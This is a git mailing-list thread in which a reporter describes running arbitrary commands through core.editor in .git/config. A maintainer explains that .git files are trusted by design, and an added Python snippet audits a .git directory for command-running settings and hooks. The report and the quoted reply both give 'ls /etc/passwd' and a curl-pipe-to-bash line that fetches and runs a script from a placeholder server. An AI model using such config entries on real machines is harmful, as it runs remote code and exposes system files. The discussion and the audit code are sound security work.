* Git vulnerability - execution of arbitrary code through .git/conf
From: Leo Silva (a.k.a kirotawa) @ 2018-08-26 2:13 UTC (permalink / raw)
To: git
Hi git community!

I found what seems to be a vulnerability/bug on git. I'm running
version 2.7.4 on Ubuntu xenial, but also tested with last version
2.19.0.rc0.2.g29d9e3e.

The steps to reproduce are:

1. open your .git/conf
2. add something like:
[core]
editor = ls /etc/passwd
or even
editor = curl -s http://server/path/malicious-script.sh | bash -s
3. run: git commit

A malicious user/repo can set some code through URL or even as command
in .git/conf and take control of your machine or silently run
malicious code.
[]'s
--
----------------------------------------------
Leônidas S. Barbosa (Kirotawa)
blog: corecode.wordpress.com
---------------------------------------------
"What matters are the countless small acts of unknown people, who lay
the foundations for the significant events that become history" - Howard Zinn
* Re: Git vulnerability - execution of arbitrary code through .git/conf
From: Jeff King @ 2018-08-26 3:19 UTC (permalink / raw)
To: Leo Silva (a.k.a kirotawa); +Cc: git
On Sat, Aug 25, 2018 at 11:13:30PM -0300, Leo Silva (a.k.a kirotawa) wrote:
> Hi git community!
>
> I found what seems to be a vulnerability/bug on git. I'm running
> version 2.7.4 on Ubuntu xenial, but also tested with last version
> 2.19.0.rc0.2.g29d9e3e.
>
> The steps to reproduce are:
>
> 1. open your .git/conf
> 2. add something like:
> [core]
> editor = ls /etc/passwd
> or even
> editor = curl -s http://server/path/malicious-script.sh | bash -s
> 3. run: git commit
>
> A malicious user/repo can set some code through URL or even as command
> in .git/conf and take control of your machine or silently run
> malicious code.
This is all working as designed. There are many ways you can execute
arbitrary code by changing files in a .git directory. As you noticed,
core.editor is one. pager.* is another one, as are hooks in .git/hooks.

Our threat model is that the files in .git are trusted, and should be
protected through normal filesystem permissions. An important part of
that model is that a "git clone" does not copy arbitrary .git files from
the other side (only objects and refs). If you find a way around that,
it would be a problem (and in fact many of the vulnerabilities we've had
have involved somehow writing into .git from the checked-out tree).
-Peff
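
Added example (not part of the thread and not git's own code): a read-only audit of a .git directory received from elsewhere, such as an unpacked archive, that lists the command-running config settings and hooks named in the reply above before any git command is run there. The key list is a non-exhaustive assumption, and `audit_config`, `active_hooks` and `SAMPLE` are names made up for this illustration.

```python
import os
import re

# Keys whose value git executes or uses to find executables (non-exhaustive).
EXACT = {"core.editor", "core.pager", "core.sshcommand", "core.fsmonitor",
         "core.hookspath", "sequence.editor", "diff.external", "gpg.program"}
BOOLS = {"", "true", "false", "yes", "no", "on", "off", "1", "0"}
SECTION_RE = re.compile(r'^\[\s*([\w.-]+)(?:\s+"((?:[^"\\]|\\.)*)")?\s*\]$')

# Constructed sample; the core.editor value is the one from the report above.
SAMPLE = """[core]
\teditor = ls /etc/passwd
[pager]
\tlog = false
\tdiff = less -S
[alias]
\tst = status
\tup = !git pull --rebase
"""

def parse_git_config(text):
    """Yield (section, subsection, key, value) from git-config syntax."""
    section = sub = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":      # blank line or comment
            continue
        m = SECTION_RE.match(line)
        if m:
            section, sub = m.group(1).lower(), m.group(2)
        elif section is not None:
            key, _, value = line.partition("=")
            yield section, sub, key.strip().lower(), value.strip()

def audit_config(text):
    hits = []
    for section, sub, key, value in parse_git_config(text):
        name = ".".join(p for p in (section, sub, key) if p)
        runs = (name in EXACT or section == "pager"          # pager.<cmd> may be a command
                or (section == "alias" and value.startswith("!")))  # "!" aliases go to the shell
        if sub is None and runs and value.lower() not in BOOLS:  # skip plain booleans
            hits.append((name, value))
    return hits

def active_hooks(git_dir):
    """Non-.sample regular files in hooks/ that carry an execute bit."""
    hooks = os.path.join(git_dir, "hooks")
    names = os.listdir(hooks) if os.path.isdir(hooks) else []
    paths = ((n, os.path.join(hooks, n)) for n in names if not n.endswith(".sample"))
    return sorted(n for n, p in paths if os.path.isfile(p) and os.stat(p).st_mode & 0o111)
```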
* Re: Git vulnerability - execution of arbitrary code through .git/conf
From: Leo Silva (a.k.a kirotawa) @ 2018-08-26 3:25 UTC (permalink / raw)
To: peff; +Cc: git
Ah, cool!
So, when a git clone is executed it generates a new .git/config to the
local one (I didn't pay attention to that).
Thanks a lot for the clarification Peff!
--
----------------------------------------------
Leônidas S. Barbosa (Kirotawa)
Security Engineer at Canonical Ltd
blog: corecode.wordpress.com
---------------------------------------------
"What matters are the countless small acts of unknown people, who lay
the foundations for the significant events that become history" - Howard Zinn